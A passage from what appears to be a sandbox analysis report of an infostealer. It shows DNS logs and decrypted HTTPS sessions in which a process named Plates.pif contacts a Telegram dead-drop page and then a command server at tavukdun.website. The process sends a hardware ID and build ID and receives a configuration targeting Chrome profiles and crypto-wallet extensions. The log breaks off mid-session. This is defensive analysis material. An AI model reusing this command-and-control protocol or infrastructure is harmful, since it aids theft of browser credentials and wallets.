Nov 1, 2024 20:58:15.565745115 CET	1.1.1.1	192.168.11.20	0xa763	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 20:58:15.565767050 CET	1.1.1.1	192.168.11.20	0xca31	No error (0)	sb.scorecardresearch.com		108.139.47.92	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:15.565767050 CET	1.1.1.1	192.168.11.20	0xca31	No error (0)	sb.scorecardresearch.com		108.139.47.33	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:15.565767050 CET	1.1.1.1	192.168.11.20	0xca31	No error (0)	sb.scorecardresearch.com		108.139.47.108	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:15.565767050 CET	1.1.1.1	192.168.11.20	0xca31	No error (0)	sb.scorecardresearch.com		108.139.47.50	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:15.662367105 CET	1.1.1.1	192.168.11.20	0x2b8c	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 20:58:15.662657022 CET	1.1.1.1	192.168.11.20	0x666b	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 20:58:17.665005922 CET	1.1.1.1	192.168.11.20	0xc5aa	No error (0)	browser.events.data.msn.com	global.asimov.events.data.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 20:58:17.685760021 CET	1.1.1.1	192.168.11.20	0xe24d	No error (0)	deff.nelreports.net	deff.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 20:58:18.159935951 CET	1.1.1.1	192.168.11.20	0x5ad5	No error (0)	px.ads.linkedin.com	afd-lnkd.www.linkedin.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 20:58:18.159935951 CET	1.1.1.1	192.168.11.20	0x5ad5	No error (0)	afd-lnkd.www.linkedin.com	www-linkedin-com.l-0005.l-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 20:58:18.191360950 CET	1.1.1.1	192.168.11.20	0xc389	No error (0)	trc.taboola.com	dualstack.tls13.taboola.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 20:58:18.191360950 CET	1.1.1.1	192.168.11.20	0xc389	No error (0)	dualstack.tls13.taboola.map.fastly.net		151.101.1.44	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.191360950 CET	1.1.1.1	192.168.11.20	0xc389	No error (0)	dualstack.tls13.taboola.map.fastly.net		151.101.129.44	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.191360950 CET	1.1.1.1	192.168.11.20	0xc389	No error (0)	dualstack.tls13.taboola.map.fastly.net		151.101.193.44	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.191360950 CET	1.1.1.1	192.168.11.20	0xc389	No error (0)	dualstack.tls13.taboola.map.fastly.net		151.101.65.44	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.208086014 CET	1.1.1.1	192.168.11.20	0xd117	No error (0)	sync.outbrain.com	alldcs.outbrain.org		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 20:58:18.208086014 CET	1.1.1.1	192.168.11.20	0xd117	No error (0)	alldcs.outbrain.org	nydc1.outbrain.org		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 20:58:18.208086014 CET	1.1.1.1	192.168.11.20	0xd117	No error (0)	nydc1.outbrain.org		64.202.112.31	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.208511114 CET	1.1.1.1	192.168.11.20	0x627c	No error (0)	pr-bh.ybp.yahoo.com	ds-pr-bh.ybp.gysm.yahoodns.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 20:58:18.208511114 CET	1.1.1.1	192.168.11.20	0x627c	No error (0)	ds-pr-bh.ybp.gysm.yahoodns.net		107.23.5.106	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.208511114 CET	1.1.1.1	192.168.11.20	0x627c	No error (0)	ds-pr-bh.ybp.gysm.yahoodns.net		52.55.17.247	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.208511114 CET	1.1.1.1	192.168.11.20	0x627c	No error (0)	ds-pr-bh.ybp.gysm.yahoodns.net		18.205.169.208	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.208511114 CET	1.1.1.1	192.168.11.20	0x627c	No error (0)	ds-pr-bh.ybp.gysm.yahoodns.net		50.17.104.165	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.228605986 CET	1.1.1.1	192.168.11.20	0xa531	No error (0)	srtb.msn.com	www.msn.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 20:58:18.228605986 CET	1.1.1.1	192.168.11.20	0xa531	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 20:58:18.491759062 CET	1.1.1.1	192.168.11.20	0xcf46	No error (0)	hbx.media.net		23.199.48.23	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.580045938 CET	1.1.1.1	192.168.11.20	0x4339	No error (0)	cm.mgid.com		104.19.131.76	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.580045938 CET	1.1.1.1	192.168.11.20	0x4339	No error (0)	cm.mgid.com		104.19.130.76	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.580045938 CET	1.1.1.1	192.168.11.20	0x4339	No error (0)	cm.mgid.com		104.19.129.76	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.580045938 CET	1.1.1.1	192.168.11.20	0x4339	No error (0)	cm.mgid.com		104.19.132.76	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.580045938 CET	1.1.1.1	192.168.11.20	0x4339	No error (0)	cm.mgid.com		104.19.133.76	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.648772955 CET	1.1.1.1	192.168.11.20	0xdbf6	No error (0)	eb2.3lift.com	na-eb2.3lift.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 20:58:18.648772955 CET	1.1.1.1	192.168.11.20	0xdbf6	No error (0)	na-eb2.3lift.com	us-east-eb2.3lift.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 20:58:18.648772955 CET	1.1.1.1	192.168.11.20	0xdbf6	No error (0)	us-east-eb2.3lift.com		52.223.22.214	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.648772955 CET	1.1.1.1	192.168.11.20	0xdbf6	No error (0)	us-east-eb2.3lift.com		35.71.139.29	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.667555094 CET	1.1.1.1	192.168.11.20	0xb1c5	No error (0)	m.adnxs.com	xandr-ms-geo.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 20:58:18.667555094 CET	1.1.1.1	192.168.11.20	0xb1c5	No error (0)	m.anycast.adnxs.com		68.67.179.153	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.667555094 CET	1.1.1.1	192.168.11.20	0xb1c5	No error (0)	m.anycast.adnxs.com		68.67.179.155	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.667555094 CET	1.1.1.1	192.168.11.20	0xb1c5	No error (0)	m.anycast.adnxs.com		68.67.179.164	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.667555094 CET	1.1.1.1	192.168.11.20	0xb1c5	No error (0)	m.anycast.adnxs.com		68.67.160.132	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.667555094 CET	1.1.1.1	192.168.11.20	0xb1c5	No error (0)	m.anycast.adnxs.com		68.67.161.208	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.667555094 CET	1.1.1.1	192.168.11.20	0xb1c5	No error (0)	m.anycast.adnxs.com		68.67.178.10	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.667555094 CET	1.1.1.1	192.168.11.20	0xb1c5	No error (0)	m.anycast.adnxs.com		68.67.160.26	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.667555094 CET	1.1.1.1	192.168.11.20	0xb1c5	No error (0)	m.anycast.adnxs.com		68.67.161.182	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.667555094 CET	1.1.1.1	192.168.11.20	0xb1c5	No error (0)	m.anycast.adnxs.com		68.67.181.211	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.667555094 CET	1.1.1.1	192.168.11.20	0xb1c5	No error (0)	m.anycast.adnxs.com		68.67.160.184	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.667555094 CET	1.1.1.1	192.168.11.20	0xb1c5	No error (0)	m.anycast.adnxs.com		68.67.160.137	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.667555094 CET	1.1.1.1	192.168.11.20	0xb1c5	No error (0)	m.anycast.adnxs.com		68.67.179.166	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.703144073 CET	1.1.1.1	192.168.11.20	0x386e	No error (0)	code.yengo.com	code-yengo.mgid.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 20:58:18.703144073 CET	1.1.1.1	192.168.11.20	0x386e	No error (0)	code-yengo.mgid.com	lb-sin.mgid.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 20:58:18.703144073 CET	1.1.1.1	192.168.11.20	0x386e	No error (0)	lb-sin.mgid.com		172.241.51.69	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.703144073 CET	1.1.1.1	192.168.11.20	0x386e	No error (0)	lb-sin.mgid.com		172.241.51.68	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.709678888 CET	1.1.1.1	192.168.11.20	0xc958	No error (0)	visitor.omnitagjs.com	visitor-usa02.omnitagjs.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 20:58:18.709678888 CET	1.1.1.1	192.168.11.20	0xc958	No error (0)	visitor-usa02.omnitagjs.com		195.244.31.11	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.709678888 CET	1.1.1.1	192.168.11.20	0xc958	No error (0)	visitor-usa02.omnitagjs.com		195.244.31.10	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.720017910 CET	1.1.1.1	192.168.11.20	0x3e3c	No error (0)	trace.mediago.io		35.208.249.213	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.746032000 CET	1.1.1.1	192.168.11.20	0x4cbb	No error (0)	trace.popin.cc		35.213.89.133	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.858927011 CET	1.1.1.1	192.168.11.20	0x5857	No error (0)	dns.quad9.net		9.9.9.9	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.858927011 CET	1.1.1.1	192.168.11.20	0x5857	No error (0)	dns.quad9.net		149.112.112.112	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.859982967 CET	1.1.1.1	192.168.11.20	0x9062	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.859982967 CET	1.1.1.1	192.168.11.20	0x9062	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:18.949815989 CET	1.1.1.1	192.168.11.20	0xfd3c	No error (0)	r.msftstatic.com	r-msftstatic-com.a-0016.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 20:58:19.017745972 CET	1.1.1.1	192.168.11.20	0xf46b	No error (0)	ib.adnxs.com	xandr-g-geo.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 20:58:19.017745972 CET	1.1.1.1	192.168.11.20	0xf46b	No error (0)	ib.anycast.adnxs.com		68.67.179.155	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:19.017745972 CET	1.1.1.1	192.168.11.20	0xf46b	No error (0)	ib.anycast.adnxs.com		68.67.160.117	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:19.017745972 CET	1.1.1.1	192.168.11.20	0xf46b	No error (0)	ib.anycast.adnxs.com		68.67.161.208	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:19.017745972 CET	1.1.1.1	192.168.11.20	0xf46b	No error (0)	ib.anycast.adnxs.com		68.67.160.75	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:19.017745972 CET	1.1.1.1	192.168.11.20	0xf46b	No error (0)	ib.anycast.adnxs.com		68.67.160.137	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:19.017745972 CET	1.1.1.1	192.168.11.20	0xf46b	No error (0)	ib.anycast.adnxs.com		68.67.160.114	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:19.017745972 CET	1.1.1.1	192.168.11.20	0xf46b	No error (0)	ib.anycast.adnxs.com		68.67.160.132	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:19.017745972 CET	1.1.1.1	192.168.11.20	0xf46b	No error (0)	ib.anycast.adnxs.com		68.67.160.26	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:19.017745972 CET	1.1.1.1	192.168.11.20	0xf46b	No error (0)	ib.anycast.adnxs.com		68.67.179.164	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:19.017745972 CET	1.1.1.1	192.168.11.20	0xf46b	No error (0)	ib.anycast.adnxs.com		68.67.160.186	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:19.017745972 CET	1.1.1.1	192.168.11.20	0xf46b	No error (0)	ib.anycast.adnxs.com		68.67.161.182	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:19.017745972 CET	1.1.1.1	192.168.11.20	0xf46b	No error (0)	ib.anycast.adnxs.com		68.67.178.10	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:58:19.022408009 CET	1.1.1.1	192.168.11.20	0xc4a	No error (0)	sync.inmobi.com	pixel-sync.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 20:58:19.313239098 CET	1.1.1.1	192.168.11.20	0xf885	No error (0)	ecn.dev.virtualearth.net	ssl2.tiles.virtualearth.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

t.me

tavukdun.website

www.google.com

https:

sb.scorecardresearch.com

trc.taboola.com

sync.outbrain.com

pr-bh.ybp.yahoo.com

hbx.media.net

cm.mgid.com

eb2.3lift.com

visitor.omnitagjs.com

m.adnxs.com

trace.mediago.io

trace.popin.cc

ib.adnxs.com

code.yengo.com

browser.events.data.msn.com

chrome.cloudflare-dns.com

dns.quad9.net

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49767	149.154.167.99	443	8460	C:\Users\user\AppData\Local\Temp\646751\Plates.pif

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:52:59 UTC	85	OUT	GET /asg7rd HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:52:59 UTC	512	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 01 Nov 2024 19:52:59 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12318 Connection: close Set-Cookie: stel_ssid=e534de69cad646680d_15746174916847639097; expires=Sat, 02 Nov 2024 19:52:59 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2024-11-01 19:52:59 UTC	12318	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 61 73 67 37 72 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @asg7rd</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	49768	188.245.203.37	443	8460	C:\Users\user\AppData\Local\Temp\646751\Plates.pif

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:53:00 UTC	231	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:53:00 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:53:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-01 19:53:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.11.20	49769	188.245.203.37	443	8460	C:\Users\user\AppData\Local\Temp\646751\Plates.pif

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:53:01 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFCGIIEHIEGDGDGCAEBG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:53:01 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 46 43 47 49 49 45 48 49 45 47 44 47 44 47 43 41 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 30 37 33 42 33 38 42 45 31 37 31 32 31 35 30 31 38 30 33 31 2d 34 35 33 66 37 31 35 66 2d 30 63 34 66 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 47 49 49 45 48 49 45 47 44 47 44 47 43 41 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 66 66 35 36 33 33 66 36 32 31 38 31 31 38 63 32 66 63 33 39 34 64 66 61 35 39 62 32 64 64 39 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 47 49 49 45 48 49 45 47 44 47 44 47 43 41 45 42 47 2d 2d 0d Data Ascii: ------CFCGIIEHIEGDGDGCAEBGContent-Disposition: form-data; name="hwid"42073B38BE171215018031-453f715f-0c4f------CFCGIIEHIEGDGDGCAEBGContent-Disposition: form-data; name="build_id"7ff5633f6218118c2fc394dfa59b2dd9------CFCGIIEHIEGDGDGCAEBG--
2024-11-01 19:53:02 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:53:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-01 19:53:02 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 33 34 36 31 38 61 61 32 64 37 62 63 36 64 61 61 35 30 33 33 66 39 31 39 32 39 35 32 37 32 38 63 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|34618aa2d7bc6daa5033f9192952728c\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.11.20	49770	188.245.203.37	443	8460	C:\Users\user\AppData\Local\Temp\646751\Plates.pif

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:53:02 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCBGIIECGHCAKECAFBFH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:53:02 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 36 31 38 61 61 32 64 37 62 63 36 64 61 61 35 30 33 33 66 39 31 39 32 39 35 32 37 32 38 63 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 66 66 35 36 33 33 66 36 32 31 38 31 31 38 63 32 66 63 33 39 34 64 66 61 35 39 62 32 64 64 39 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 Data Ascii: ------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="token"34618aa2d7bc6daa5033f9192952728c------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="build_id"7ff5633f6218118c2fc394dfa59b2dd9------GCBGIIECGHCAKECAFBFHCont
2024-11-01 19:53:03 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:53:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-01 19:53:03 UTC	2104	IN	Data Raw: 38 32 63 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 Data Ascii: 82cR29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.11.20	49771	188.245.203.37	443	8460	C:\Users\user\AppData\Local\Temp\646751\Plates.pif

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:53:03 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAAAKJKJEBGHJKFHIDGC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:53:03 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 41 41 41 4b 4a 4b 4a 45 42 47 48 4a 4b 46 48 49 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 36 31 38 61 61 32 64 37 62 63 36 64 61 61 35 30 33 33 66 39 31 39 32 39 35 32 37 32 38 63 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 41 4b 4a 4b 4a 45 42 47 48 4a 4b 46 48 49 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 66 66 35 36 33 33 66 36 32 31 38 31 31 38 63 32 66 63 33 39 34 64 66 61 35 39 62 32 64 64 39 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 41 4b 4a 4b 4a 45 42 47 48 4a 4b 46 48 49 44 47 43 0d 0a 43 6f 6e 74 Data Ascii: ------AAAAKJKJEBGHJKFHIDGCContent-Disposition: form-data; name="token"34618aa2d7bc6daa5033f9192952728c------AAAAKJKJEBGHJKFHIDGCContent-Disposition: form-data; name="build_id"7ff5633f6218118c2fc394dfa59b2dd9------AAAAKJKJEBGHJKFHIDGCCont
2024-11-01 19:53:04 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:53:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-01 19:53:04 UTC	5685	IN	Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.11.20	49772	188.245.203.37	443	8460	C:\Users\user\AppData\Local\Temp\646751\Plates.pif

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:53:04 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCAAEBFHJJDAAKFIECGD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
